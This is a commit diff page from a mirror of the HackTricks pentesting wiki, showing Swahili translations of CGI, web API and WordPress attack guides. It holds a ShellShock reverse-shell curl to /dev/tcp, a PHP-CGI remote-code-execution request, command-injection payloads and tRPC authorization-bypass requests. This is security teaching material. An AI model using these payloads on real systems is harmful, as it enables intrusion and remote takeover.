maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['', 'src/pentesting-web/command-injection.md', 'src/linux-ha

Browse Source
This commit is contained in:
Translator 2025-10-07 10:27:07 +00:00
parent 7f09014c74
commit b25d4663a6
8 changed files with 717 additions and 679 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

BIN
src/images/k8studio.jpg
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 6.5 KiB

BIN
src/images/k8studio.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 87 KiB

613
src/linux-hardening/privilege-escalation/README.md
View File

File diff suppressed because it is too large Load Diff

53
src/network-services-pentesting/pentesting-web/cgi.md
View File

@ -3,22 +3,22 @@
{{#include ../../banners/hacktricks-training.md}} {{#include ../../banners/hacktricks-training.md}}
## Maelezo ## Taarifa
The **CGI scripts are perl scripts**, hivyo, ikiwa ume-compromise server inayoweza kutekeleza _**.cgi**_ scripts unaweza **kupakia perl reverse shell** \(`/usr/share/webshells/perl/perl-reverse-shell.pl`\), **kubadilisha extension** kutoka **.pl** hadi **.cgi**, kutoa **execute permissions** \(`chmod +x`\) na **kupata** reverse shell **kutoka kwenye web browser** ili kuitekeleza. The **CGI scripts are perl scripts**, hivyo, ikiwa umepata udhibiti wa server inayoweza kutekeleza _**.cgi**_ scripts unaweza **kupakia a perl reverse shell** \(`/usr/share/webshells/perl/perl-reverse-shell.pl`\), **kubadilisha extension** kutoka **.pl** hadi **.cgi**, kumpa **execute permissions** \(`chmod +x`\) na **kupata** reverse shell **kutoka kwa web browser** ili kuitekeleza.
Ili kujaribu **CGI vulns** inashauriwa kutumia `nikto -C all` \(and all the plugins\) Ili kujaribu kwa **CGI vulns** inashauriwa kutumia `nikto -C all` \(na plugins zote\)
## **ShellShock** ## **ShellShock**
**ShellShock** ni udhaifu unaoathiri kwa kiasi kikubwa **Bash** command-line shell katika mifumo ya uendeshaji inayotegemea Unix. Unalenga uwezo wa Bash wa kuendesha amri zinazotumwa na applications. Udhaifu upo katika udhibiti wa **environment variables**, ambazo ni thamani zilizopewa majina zinazoendelea (dynamic) ambazo huathiri jinsi michakato inavyotekelezwa kwenye kompyuta. Washambuliaji wanaweza kutumia hili kwa kuambatisha **malicious code** kwenye environment variables, ambayo itaendeshwa wakati variable inapopokelewa. Hii inawawezesha washambuliaji ku-compromise mfumo. **ShellShock** ni **vulnerability** inayogusa shell ya amri inayotumika sana **Bash** katika mifumo ya uendeshaji ya Unix-based. Inalenga uwezo wa Bash kutekeleza amri zinazopitishwa na applications. Udhaifu uko katika udhibiti wa **environment variables**, ambazo ni thamani zilizopewa majina zinazobadilika na zinaathiri jinsi process zinavyotekelezwa kwenye kompyuta. Washambuliaji wanaweza kutengeneza udhaifu huu kwa kuambatanisha **msimbo hatari** kwenye environment variables, ambao hutekelezwa wakati variable inapopokelewa. Hii inamruhusu mshambuliaji kuathiri mfumo.
Kutumia udhaifu huu, **ukurasa unaweza kurudisha kosa**. Kwa kutumia udhaifu huu **ukurasa unaweza kurudisha kosa**.
Unaweza **kupata** udhaifu huu ukiangalia kuwa unatumia **old Apache version** na **cgi_mod** \(with cgi folder\) au kwa kutumia **nikto**. Unaweza **kupata** udhaifu huu kwa kuona kuwa inatumia **old Apache version** na **cgi_mod** \(na cgi folder\) au kwa kutumia **nikto**.
### **Jaribu** ### **Test**
Vipimo vingi vinategemea ku-echo kitu na kutegemea kwamba mnyororo huo utarudishwa katika majibu ya wavuti. Ikiwa unaamini ukurasa unaweza kuwa dhaifu, tafuta kurasa zote za cgi na uziteste. Mitihani mingi inategemea kutoa echo ya kitu na kutarajia kwamba mnyororo huo urudi katika response ya web. Ikiwa unadhani ukurasa unaweza kuwa vulnerable, tafuta kurasa zote za cgi na zipime.
**Nmap** **Nmap**
```bash ```bash
@ -51,17 +51,17 @@ curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.11.0.41/80 0>&1' htt
> set rhosts 10.1.2.11 > set rhosts 10.1.2.11
> run > run
``` ```
## Dispatchers za CGI zilizo katikati (routing ya endpoint moja kupitia selector parameters) ## Wasambazaji wa CGI waliowekwa kati (single endpoint routing via selector parameters)
Mengi ya embedded web UIs huweka pamoja (multiplex) vitendo vingi vyenye ruhusa nyuma ya endpoint moja ya CGI (kwa mfano, `/cgi-bin/cstecgi.cgi`) na hutumia selector parameter kama `topicurl=<handler>` ku-routing ombi kwa function ya ndani. UI nyingi za wavuti zilizojengewa ndani huunganisha vitendo vingi vyenye ruhusa nyuma ya single CGI endpoint (kwa mfano, `/cgi-bin/cstecgi.cgi`) na hutumia selector parameter kama `topicurl=<handler>` kupeleka ombi kwa kazi ya ndani.
Mbinu za ku-exploit routers hizi: Mbinu za kuchukua faida ya router hizi:
- Enumerate handler names: scrape JS/HTML, brute-force with wordlists, au unpack firmware na grep kwa handler strings zinazotumika na dispatcher. - Orodhesha majina ya handler: scrape JS/HTML, brute-force kwa wordlists, au unpack firmware na grep kwa handler strings zinazotumiwa na dispatcher.
- Test unauthenticated reachability: baadhi ya handlers husahau auth checks na zinaweza kupatikana moja kwa moja. - Jaribu ufikikaji bila uthibitisho (unauthenticated reachability): baadhi ya handlers huzisahau cheki za auth na zinaweza kuitwa moja kwa moja.
- Focus on handlers that invoke system utilities or touch files; weak validators often only block a few characters and might miss the leading hyphen `-`. - Lenga handlers zinazowaita system utilities au kugusa files; validators dhaifu mara nyingi huwazuia herufi chache tu na huenda ikakosa hyphen ya mwanzoni `-`.
Generic exploit shapes: Aina za generic exploit:
```http ```http
POST /cgi-bin/cstecgi.cgi HTTP/1.1 POST /cgi-bin/cstecgi.cgi HTTP/1.1
Content-Type: application/x-www-form-urlencoded Content-Type: application/x-www-form-urlencoded
@ -75,30 +75,29 @@ topicurl=setEasyMeshAgentCfg&agentName=;id;
# 3) Validator bypass → arbitrary file write in file-touching handlers # 3) Validator bypass → arbitrary file write in file-touching handlers
topicurl=setWizardCfg&<crafted_fields>=/etc/init.d/S99rc topicurl=setWizardCfg&<crafted_fields>=/etc/init.d/S99rc
``` ```
Detection and hardening: Utambuzi na kuimarisha usalama:
- Angalia ombi zisizo za kuthibitishwa kwa centralized CGI endpoints zikiwa na `topicurl` imewekwa kwa sensitive handlers. - Angalia maombi yasiyo na uthibitisho kwa endpoints za CGI za kati na `topicurl` imewekwa kwa handlers nyeti.
- Flag vigezo vinavyoanza na `-` (argv option injection attempts). - Tambua vigezo vinavyoanza na `-` (jaribio la argv option injection).
- Wauzaji: lazimisha authentication kwa state-changing handlers zote, validate kwa kutumia strict allowlists/types/lengths, na kamwe usipitishe user-controlled strings kama command-line flags. - Wauzaji: weka uthibitisho kwa handlers zote zinazobadilisha state, thibitisha kwa kutumia allowlists/aina/urefu kali, na kamwe usipitishe nyuzi zilizo chini ya udhibiti wa mtumiaji kama command-line flags.
## PHP ya zamani + CGI = RCE \(CVE-2012-1823, CVE-2012-2311\) ## PHP ya zamani + CGI = RCE \(CVE-2012-1823, CVE-2012-2311\)
Kwa ujumla, ikiwa cgi imewezeshwa na php ni "old" \(&lt;5.3.12 / &lt; 5.4.2\) unaweza execute code. Kwa kifupi, ikiwa cgi iko active na php ni "old" \(&lt;5.3.12 / &lt; 5.4.2\) unaweza execute code.
Ili exploit ugani huu unahitaji kufikia faili fulani ya PHP ya web server bila kutuma parameters \(hasa bila kutuma tabia "="\). Ili ku-exploit hii vulnerability unahitaji kufikia baadhi ya faili za PHP za web server bila kutuma parameters \(hasa bila kutuma tabia "="\).
Kisha, kwa kujaribu ugani huu, unaweza kufikia kwa mfano `/index.php?-s` \(tazama `-s`\) na **source code ya application itaonekana katika response**. Kisha, ili kujaribu hii vulnerability, unaweza kufikia kwa mfano `/index.php?-s` \(angalia `-s`\) na **source code ya application itaonekana kwenye response**.
Kisha, ili kupata **RCE** unaweza kutuma query maalum: `/?-d allow_url_include=1 -d auto_prepend_file=php://input` na **PHP code** itakayotekelezwa iko katika **body ya request**. Kisha, ili kupata **RCE** unaweza kutuma query maalum: `/?-d allow_url_include=1 -d auto_prepend_file=php://input` na **PHP code** itakayotekelezwa iko katika **mwili wa request. Mfano:**
Example:
```bash ```bash
curl -i --data-binary "<?php system(\"cat /flag.txt \") ?>" "http://jh2i.com:50008/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input" curl -i --data-binary "<?php system(\"cat /flag.txt \") ?>" "http://jh2i.com:50008/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input"
``` ```
**Taarifa zaidi kuhusu vuln na exploits zinazowezekana:** [**https://www.zero-day.cz/database/337/**](https://www.zero-day.cz/database/337/)**,** [**cve-2012-1823**](https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-1823)**,** [**cve-2012-2311**](https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-2311)**,** [**CTF Writeup Example**](https://github.com/W3rni0/HacktivityCon_CTF_2020#gi-joe)**.** **Taarifa zaidi kuhusu vuln na possible exploits:** [**https://www.zero-day.cz/database/337/**](https://www.zero-day.cz/database/337/)**,** [**cve-2012-1823**](https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-1823)**,** [**cve-2012-2311**](https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-2311)**,** [**CTF Writeup Example**](https://github.com/W3rni0/HacktivityCon_CTF_2020#gi-joe)**.**
## **Proxy \(MitM to Web server requests\)** ## **Proxy \(MitM to Web server requests\)**
CGI inaunda environment variable kwa kila header katika http request. Kwa mfano: "host:web.com" inaundwa kama "HTTP_HOST"="web.com" CGI huunda variable ya mazingira kwa kila header katika http request. Kwa mfano: "host:web.com" huundwa kama "HTTP_HOST"="web.com"
Kwa kuwa HTTP_PROXY variable inaweza kutumika na web server. Jaribu kutuma **header** inayoonyesha: "**Proxy: &lt;IP_attacker&gt;:&lt;PORT&gt;**". Ikiwa server itafanya ombi lolote wakati wa session, utaweza kunasa kila ombi litakalo fanywa na server. Kwa kuwa variable ya HTTP_PROXY inaweza kutumika na web server. Jaribu kutuma **header** yenye: "**Proxy: &lt;IP_attacker&gt;:&lt;PORT&gt;**" na ikiwa server itafanya ombi lolote wakati wa session, utaweza kunasa kila ombi linalofanywa na server.
## **Marejeo** ## **Marejeo**

96
src/network-services-pentesting/pentesting-web/web-api-pentesting.md
View File

@ -2,54 +2,96 @@
{{#include ../../banners/hacktricks-training.md}} {{#include ../../banners/hacktricks-training.md}}
## API Pentesting Methodology Summary ## Muhtasari wa Mbinu za API Pentesting
Pentesting APIs inahusisha njia iliyopangwa ya kugundua udhaifu. Mwongo huu unajumuisha mbinu kamili, ukisisitiza mbinu na zana za vitendo. Pentesting APIs inahitaji mbinu iliyo na muundo ili kubaini udhaifu. Mwongozo huu unafupisha mbinu kamili, ukisisitiza mbinu za vitendo na zana.
### **Understanding API Types** ### **Kuelewa Aina za API**
- **SOAP/XML Web Services**: Tumia muundo wa WSDL kwa ajili ya nyaraka, mara nyingi hupatikana kwenye njia za `?wsdl`. Zana kama **SOAPUI** na **WSDLer** (Burp Suite Extension) ni muhimu kwa ajili ya kuchambua na kuunda maombi. Mfano wa nyaraka unapatikana kwenye [DNE Online](http://www.dneonline.com/calculator.asmx). - **SOAP/XML Web Services**: Tumia format ya WSDL kwa dokumenti, kawaida hupatikana kwenye path za `?wsdl`. Zana kama **SOAPUI** na **WSDLer** (Burp Suite Extension) ni muhimu kwa kusoma na kuunda requests. Mfano wa dokumenti upo kwenye [DNE Online](http://www.dneonline.com/calculator.asmx).
- **REST APIs (JSON)**: Nyaraka mara nyingi zinakuja katika faili za WADL, lakini zana kama [Swagger UI](https://swagger.io/tools/swagger-ui/) zinatoa kiolesura rahisi zaidi kwa ajili ya mwingiliano. **Postman** ni zana muhimu kwa ajili ya kuunda na kusimamia maombi ya mfano. - **REST APIs (JSON)**: Dokumenti mara nyingi hutolewa kama faili za WADL, lakini zana kama [Swagger UI](https://swagger.io/tools/swagger-ui/) zinatoa interface rahisi kwa kuingiliana. **Postman** ni zana muhimu kwa kuunda na kusimamia mifano ya requests.
- **GraphQL**: Lugha ya kuhoji kwa APIs inatoa maelezo kamili na yanayoeleweka kuhusu data katika API yako. - **GraphQL**: Lugha ya query kwa APIs inayotoa maelezo kamili na yanayoweza kueleweka ya data iliyopo kwenye API yako.
### **Practice Labs** ### **Maabara za Mazoezi**
- [**VAmPI**](https://github.com/erev0s/VAmPI): API yenye udhaifu wa makusudi kwa ajili ya mazoezi ya vitendo, ikifunika udhaifu wa juu 10 wa API wa OWASP. - [**VAmPI**](https://github.com/erev0s/VAmPI): API iliyoundwa kwa makusudi kuwa na udhaifu kwa mazoezi ya vitendo, ikifunika OWASP top 10 API vulnerabilities.
### **Effective Tricks for API Pentesting** ### **Mbinu Madhubuti za API Pentesting**
- **SOAP/XML Vulnerabilities**: Chunguza udhaifu wa XXE, ingawa matangazo ya DTD mara nyingi yanapigwa marufuku. Mifumo ya CDATA inaweza kuruhusu kuingiza payload ikiwa XML inabaki kuwa halali. - **SOAP/XML Vulnerabilities**: Chunguza XXE vulnerabilities, ingawa DTD declarations mara nyingi huwekewa vizuizi. CDATA tags zinaweza kuruhusu kuingiza payload ikiwa XML inabaki kuwa halali.
- **Privilege Escalation**: Jaribu mwisho wa huduma zenye viwango tofauti vya ruhusa ili kubaini uwezekano wa ufikiaji usioidhinishwa. - **Privilege Escalation**: Jaribu endpoints kwa viwango tofauti vya vibali ili kubaini uwezekano wa ufikiaji usioidhinishwa.
- **CORS Misconfigurations**: Chunguza mipangilio ya CORS kwa uwezekano wa kutumiwa kupitia mashambulizi ya CSRF kutoka kwa vikao vilivyoidhinishwa. - **CORS Misconfigurations**: Chunguza mipangilio ya CORS kwa uwezekano wa kutumiwa kupitia CSRF attacks kutoka kwa session zilizo authenticate-ikiwa.
- **Endpoint Discovery**: Tumia mifumo ya API kugundua mwisho wa huduma zilizofichwa. Zana kama fuzzers zinaweza kuharakisha mchakato huu. - **Endpoint Discovery**: Tumia pattern za API kugundua endpoints zilizofichwa. Zana kama fuzzers zinaweza kuendesha mchakato huu kiotomatiki.
- **Parameter Tampering**: Jaribu kuongeza au kubadilisha vigezo katika maombi ili kufikia data au kazi zisizoidhinishwa. - **Parameter Tampering**: Jaribu kuongeza au kubadilisha parameters katika requests ili kupata data au functionalities zisizoidhinishwa.
- **HTTP Method Testing**: Badilisha mbinu za maombi (GET, POST, PUT, DELETE, PATCH) ili kugundua tabia zisizotarajiwa au ufichuzi wa taarifa. - **HTTP Method Testing**: Badilisha methods za request (GET, POST, PUT, DELETE, PATCH) ili kugundua tabia zisizotarajiwa au ufunuo wa taarifa.
- **Content-Type Manipulation**: Badilisha kati ya aina tofauti za maudhui (x-www-form-urlencoded, application/xml, application/json) ili kujaribu matatizo ya uchambuzi au udhaifu. - **Content-Type Manipulation**: Badilisha kati ya content types tofauti (x-www-form-urlencoded, application/xml, application/json) kujaribu masuala ya parsing au udhaifu.
- **Advanced Parameter Techniques**: Jaribu na aina zisizotarajiwa za data katika payloads za JSON au cheza na data za XML kwa ajili ya XXE injections. Pia, jaribu uchafuzi wa vigezo na wahusika wa wildcard kwa ajili ya majaribio mapana. - **Advanced Parameter Techniques**: Jaribu aina za data zisizotarajiwa katika JSON payloads au cheza na data za XML kwa XXE injections. Pia, jaribu parameter pollution na wildcard characters kwa upimaji mpana.
- **Version Testing**: Toleo la zamani la API linaweza kuwa na uwezekano mkubwa wa kushambuliwa. Daima angalia na jaribu dhidi ya matoleo mengi ya API. - **Version Testing**: Toleo za zamani za API zinaweza kuwa nyeti zaidi kwa mashambulizi. Daima angalia na upime dhidi ya matoleo mengi ya API.
### **Tools and Resources for API Pentesting** ### Authorization & Business Logic (AuthN != AuthZ) — tRPC/Zod protectedProcedure pitfalls
- [**kiterunner**](https://github.com/assetnote/kiterunner): Nzuri kwa ajili ya kugundua mwisho wa API. Tumia kuangalia na kujaribu nguvu njia na vigezo dhidi ya APIs lengwa. Stack za kisasa za TypeScript mara nyingi hutumia tRPC pamoja na Zod kwa validation ya input. Katika tRPC, `protectedProcedure` kawaida inahakikisha request ina session halali (authentication) lakini haimaanishi mwito una haki ya role/vipengele (authorization). Mchanganyiko huu unaweza kusababisha Broken Function Level Authorization/BOLA ikiwa procedures nyeti zimefungwa tu kwa `protectedProcedure`.
- Threat model: Mtumiaji yeyote aliye authenticate lakini mwenye vibali vya chini anaweza kusababisha procedures za daraja la admin ikiwa ukaguzi wa role haupo (mfano, background migrations, feature flags, tenant-wide maintenance, job control).
- Black-box signal: `POST /api/trpc/<router>.<procedure>` endpoints ambazo zinafanikiwa kwa akaunti za kawaida wakati zinapaswa kuwa kwa admin tu. Self-serve signups huongeza kwa kiasi kikubwa uwezekano wa kutumika.
- Typical tRPC route shape (v10+): JSON body imefungwa chini ya `{"input": {...}}`.
Example vulnerable pattern (no role/permission gate):
```ts
// The endpoint for retrying a migration job
// This checks for a valid session (authentication)
retry: protectedProcedure
// but not for an admin role (authorization).
.input(z.object({ name: z.string() }))
.mutation(async ({ input, ctx }) => {
// Logic to restart a sensitive migration
}),
```
Utekelezaji wa vitendo (black-box)
1) Sajili akaunti ya kawaida na upate sesi iliyothibitishwa (cookies/headers).
2) Orodhesha background jobs au rasilimali nyeti kupitia taratibu za “list”/“all”/“status”.
```bash
curl -s -X POST 'https://<tenant>/api/trpc/backgroundMigrations.all' \
-H 'Content-Type: application/json' \
-b '<AUTH_COOKIES>' \
--data '{"input":{}}'
```
3) Tekeleza vitendo vya kibali kama kuanzisha upya job:
```bash
curl -s -X POST 'https://<tenant>/api/trpc/backgroundMigrations.retry' \
-H 'Content-Type: application/json' \
-b '<AUTH_COOKIES>' \
--data '{"input":{"name":"<migration_name>"}}'
```
Impact to assess
- Uharibifu wa data kutokana na uanzishaji upya usio-idempotent: Kuamsha utekelezaji sambamba wa migrations/workers kunaweza kusababisha race conditions na hali zisizoendelevu kwa sehemu (kupotea kwa data bila ishara, analytics zilizoharibika).
- DoS via worker/DB starvation: Kurudia kuanzisha kazi nzito kunaweza kuchosha worker pools na muunganisho wa database, kusababisha kuzimwa kwa huduma kwa wapangaji wote.
### **Vifaa na Rasilimali kwa API Pentesting**
- [**kiterunner**](https://github.com/assetnote/kiterunner): Inafaa sana kwa kugundua API endpoints. Itumie kufanya scan na brute force paths na parameters dhidi ya API lengwa.
```bash ```bash
kr scan https://domain.com/api/ -w routes-large.kite -x 20 kr scan https://domain.com/api/ -w routes-large.kite -x 20
kr scan https://domain.com/api/ -A=apiroutes-220828 -x 20 kr scan https://domain.com/api/ -A=apiroutes-220828 -x 20
kr brute https://domain.com/api/ -A=raft-large-words -x 20 -d=0 kr brute https://domain.com/api/ -A=raft-large-words -x 20 -d=0
kr brute https://domain.com/api/ -w /tmp/lang-english.txt -x 20 -d=0 kr brute https://domain.com/api/ -w /tmp/lang-english.txt -x 20 -d=0
``` ```
- [**https://github.com/BishopFox/sj**](https://github.com/BishopFox/sj): sj ni zana ya mistari ya amri iliyoundwa kusaidia katika ukaguzi wa **faili za ufafanuzi za Swagger/OpenAPI zilizofichuliwa** kwa kuangalia mwisho wa API zinazohusiana kwa uthibitisho dhaifu. Pia inatoa templeti za amri kwa ajili ya kupima udhaifu kwa mikono. - [**https://github.com/BishopFox/sj**](https://github.com/BishopFox/sj): sj ni zana ya mstari wa amri iliyoundwa kusaidia ukaguzi wa **faili za ufafanuzi za Swagger/OpenAPI zilizo wazi** kwa kukagua API endpoints zinazohusiana kwa uthibitishaji dhaifu. Pia hutoa templates za amri kwa ajili ya upimaji wa udhaifu kwa mkono.
- Zana za ziada kama **automatic-api-attack-tool**, **Astra**, na **restler-fuzzer** zinatoa kazi maalum za kupima usalama wa API, kuanzia simulating shambulio hadi fuzzing na skanning ya udhaifu. - Zana nyingine kama **automatic-api-attack-tool**, **Astra**, na **restler-fuzzer** zinatoa vipengele vilivyobinafsishwa kwa ajili ya upimaji wa usalama wa API, kuanzia kuiga mashambulizi hadi fuzzing na uchunguzi wa udhaifu.
- [**Cherrybomb**](https://github.com/blst-security/cherrybomb): Ni zana ya usalama wa API inayokagua API yako kulingana na faili ya OAS (zana hiyo imeandikwa kwa rust). - [**Cherrybomb**](https://github.com/blst-security/cherrybomb): Ni zana ya usalama ya API inayokagua API yako kwa msingi wa faili ya OAS (zana imeandikwa kwa Rust).
### **Rasilimali za Kujifunza na Mazoezi** ### **Rasilimali za Kujifunza na Mazoezi**
- **OWASP API Security Top 10**: Kusoma muhimu kwa kuelewa udhaifu wa kawaida wa API ([OWASP Top 10](https://github.com/OWASP/API-Security/blob/master/2019/en/dist/owasp-api-security-top-10.pdf)). - **OWASP API Security Top 10**: Kusoma muhimu kwa kuelewa udhaifu wa kawaida wa API ([OWASP Top 10](https://github.com/OWASP/API-Security/blob/master/2019/en/dist/owasp-api-security-top-10.pdf)).
- **API Security Checklist**: Orodha kamili ya kuhakikisha usalama wa APIs ([GitHub link](https://github.com/shieldfy/API-Security-Checklist)). - **API Security Checklist**: Orodha kamili ya ukaguzi kwa ajili ya usalama wa API ([GitHub link](https://github.com/shieldfy/API-Security-Checklist)).
- **Logger++ Filters**: Kwa ajili ya kuwinda udhaifu wa API, Logger++ inatoa filters muhimu ([GitHub link](https://github.com/bnematzadeh/LoggerPlusPlus-API-Filters)). - **Logger++ Filters**: Kwa kuwinda udhaifu wa API, Logger++ inatoa vichujio muhimu ([GitHub link](https://github.com/bnematzadeh/LoggerPlusPlus-API-Filters)).
- **API Endpoints List**: Orodha iliyochaguliwa ya mwisho wa API zinazoweza kutumika kwa madhumuni ya kupima ([GitHub gist](https://gist.github.com/yassineaboukir/8e12adefbd505ef704674ad6ad48743d)). - **API Endpoints List**: Orodha iliyochaguliwa ya endpoints za API zinazowezekana kwa madhumuni ya upimaji ([GitHub gist](https://gist.github.com/yassineaboukir/8e12adefbd505ef704674ad6ad48743d)).
## Marejeleo ## Marejeo
- [https://github.com/Cyber-Guy1/API-SecurityEmpire](https://github.com/Cyber-Guy1/API-SecurityEmpire) - [https://github.com/Cyber-Guy1/API-SecurityEmpire](https://github.com/Cyber-Guy1/API-SecurityEmpire)
- [How An Authorization Flaw Reveals A Common Security Blind Spot: CVE-2025-59305 Case Study](https://www.depthfirst.com/post/how-an-authorization-flaw-reveals-a-common-security-blind-spot-cve-2025-59305-case-study)
{{#include ../../banners/hacktricks-training.md}} {{#include ../../banners/hacktricks-training.md}}

450
src/network-services-pentesting/pentesting-web/wordpress.md
View File

@ -4,49 +4,49 @@
## Taarifa za Msingi ## Taarifa za Msingi
- **Faili zilizopakiwa** huenda kwa: `http://10.10.10.10/wp-content/uploads/2018/08/a.txt` - **Uploaded** files go to: `http://10.10.10.10/wp-content/uploads/2018/08/a.txt`
- **Faili za theme zinaweza kupatikana katika /wp-content/themes/,** hivyo ukibadilisha php ya theme ili kupata RCE labda utatumia path hiyo. Kwa mfano: Kwa kutumia **theme twentytwelve** unaweza **kupata** faili ya **404.php** katika: [**/wp-content/themes/twentytwelve/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php) - **Themes files can be found in /wp-content/themes/,** so if you change some php of the theme to get RCE you probably will use that path. For example: Using **theme twentytwelve** you can **access** the **404.php** file in: [**/wp-content/themes/twentytwelve/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)
- **URL nyingine yenye manufaa inaweza kuwa:** [**/wp-content/themes/default/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php) - **Another useful url could be:** [**/wp-content/themes/default/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)
- Katika **wp-config.php** unaweza kupata nenosiri la root la database. - Katika **wp-config.php** unaweza kupata password ya root ya database.
- Njia za kuingia za default za kuangalia: _**/wp-login.php, /wp-login/, /wp-admin/, /wp-admin.php, /login/**_ - Njia za kuingia za default za kuchunguza: _**/wp-login.php, /wp-login/, /wp-admin/, /wp-admin.php, /login/**_
### **Main WordPress Files** ### **Faili Muhimu za WordPress**
- `index.php` - `index.php`
- `license.txt` ina taarifa muhimu kama toleo la WordPress lililosanidiwa. - `license.txt` ina taarifa muhimu kama toleo la WordPress lililosanikishwa.
- `wp-activate.php` inatumika kwa mchakato wa uanzishaji wa barua pepe wakati wa kuweka tovuti mpya ya WordPress. - `wp-activate.php` inatumika kwa mchakato wa uthibitisho wa email wakati wa kuanzisha tovuti mpya ya WordPress.
- Folda za login (zinaweza kubadilishwa jina ili kuficha): - Folda za login (zinaweza kubadilishwa jina ili kuzificha):
- `/wp-admin/login.php` - `/wp-admin/login.php`
- `/wp-admin/wp-login.php` - `/wp-admin/wp-login.php`
- `/login.php` - `/login.php`
- `/wp-login.php` - `/wp-login.php`
- `xmlrpc.php` ni faili inayowakilisha kipengele cha WordPress kinachoruhusu data kutumwa kutumia HTTP kama njia ya usafirishaji na XML kama mbinu ya enkoding. Aina hii ya mawasiliano imebadilishwa na WordPress [REST API](https://developer.wordpress.org/rest-api/reference). - `xmlrpc.php` ni faili inayowakilisha kipengele cha WordPress kinachowezesha data kutumwa kwa kutumia HTTP kama mekanisma ya usafirishaji na XML kama mekanisma ya ufafanuzi. Aina hii ya mawasiliano imebadilishwa na WordPress [REST API](https://developer.wordpress.org/rest-api/reference).
- Folda ya `wp-content` ni saraka kuu ambapo plugins na themes zinahifadhiwa. - Kabrasha la `wp-content` ndilo saraka kuu ambapo plugins na themes zinahifadhiwa.
- `wp-content/uploads/` Ni saraka ambayo faili zote zinazopakiwa kwenye jukwaa zinalindwa. - `wp-content/uploads/` ni saraka ambapo faili zote zilizopakiwa kwenye jukwaa zinahifadhiwa.
- `wp-includes/` Hii ni saraka ambapo faili za kernel zinahifadhiwa, kama certificates, fonts, faili za JavaScript, na widgets. - `wp-includes/` Hii ni saraka ambapo faili za msingi zinahifadhiwa, kama vyeti, fonts, faili za JavaScript, na widgets.
- `wp-sitemap.xml` Katika matoleo ya WordPress 5.5 na zaidi, WordPress huzalisha faili ya sitemap XML yenye machapisho yote ya umma na aina za post na taxonomies zinazoweza kuhojiwa hadharani. - `wp-sitemap.xml` Katika toleo la WordPress 5.5 na zaidi, WordPress inazalisha faili ya sitemap XML yenye machapisho yote ya umma na aina za posti zinazoweza kuombwa hadharani na taxonomies.
**Post exploitation** **Post exploitation**
- Faili ya `wp-config.php` ina taarifa zinazohitajika na WordPress kuunganishwa na database kama jina la database, database host, username na password, authentication keys and salts, na prefix ya jedwali la database. Faili hii ya configuration pia inaweza kutumika kuwasha DEBUG mode, ambayo inaweza kusaidia katika kutatua matatizo. - The `wp-config.php` file contains information required by WordPress to connect to the database such as the database name, database host, username and password, authentication keys and salts, and the database table prefix. This configuration file can also be used to activate DEBUG mode, which can useful in troubleshooting.
### Ruhusa za Watumiaji ### Ruhusa za watumiaji
- **Administrator** - **Administrator**
- **Editor**: Kuchapisha na kusimamia machapisho yake na ya wengine - **Editor**: Kuchapisha na kusimamia machapisho yake na ya wengine
- **Author**: Kuchapisha na kusimamia machapisho yake mwenyewe - **Author**: Kuchapisha na kusimamia machapisho yake mwenyewe
- **Contributor**: Kuandika na kusimamia machapisho yake lakini hawezi kuyachapisha - **Contributor**: Kuandika na kusimamia machapisho yake lakini hawezi kuyachapisha
- **Subscriber**: Kuangalia machapisho na kuhariri wasifu wao - **Subscriber**: Kusoma machapisho na kuhariri wasifu wao
## **Passive Enumeration** ## **Uchunguzi wa Kiasili**
### **Get WordPress version** ### **Pata toleo la WordPress**
Angalia kama unaweza kupata faili `/license.txt` au `/readme.html` Angalia kama unaweza kupata faili `/license.txt` au `/readme.html`
Ndani ya **msimbo wa chanzo** wa ukurasa (mfano kutoka [https://wordpress.org/support/article/pages/](https://wordpress.org/support/article/pages/)): Ndani ya **source code** ya ukurasa (mfano kutoka [https://wordpress.org/support/article/pages/](https://wordpress.org/support/article/pages/)):
- grep - grep
```bash ```bash
@ -56,7 +56,7 @@ curl https://victim.com/ | grep 'content="WordPress'
![](<../../images/image (1111).png>) ![](<../../images/image (1111).png>)
- Faili za viungo vya CSS - Faili za link za CSS
![](<../../images/image (533).png>) ![](<../../images/image (533).png>)
@ -72,44 +72,44 @@ curl -H 'Cache-Control: no-cache, no-store' -L -ik -s https://wordpress.org/supp
```bash ```bash
curl -s -X GET https://wordpress.org/support/article/pages/ | grep -E 'wp-content/themes' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2 curl -s -X GET https://wordpress.org/support/article/pages/ | grep -E 'wp-content/themes' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2
``` ```
### Chota matoleo kwa ujumla ### Kutoa matoleo kwa ujumla
```bash ```bash
curl -H 'Cache-Control: no-cache, no-store' -L -ik -s https://wordpress.org/support/article/pages/ | grep http | grep -E '?ver=' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2 curl -H 'Cache-Control: no-cache, no-store' -L -ik -s https://wordpress.org/support/article/pages/ | grep http | grep -E '?ver=' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2
``` ```
## Uorodhesaji hai ## Active enumeration
### Plugins and Themes ### Plugins na Themes
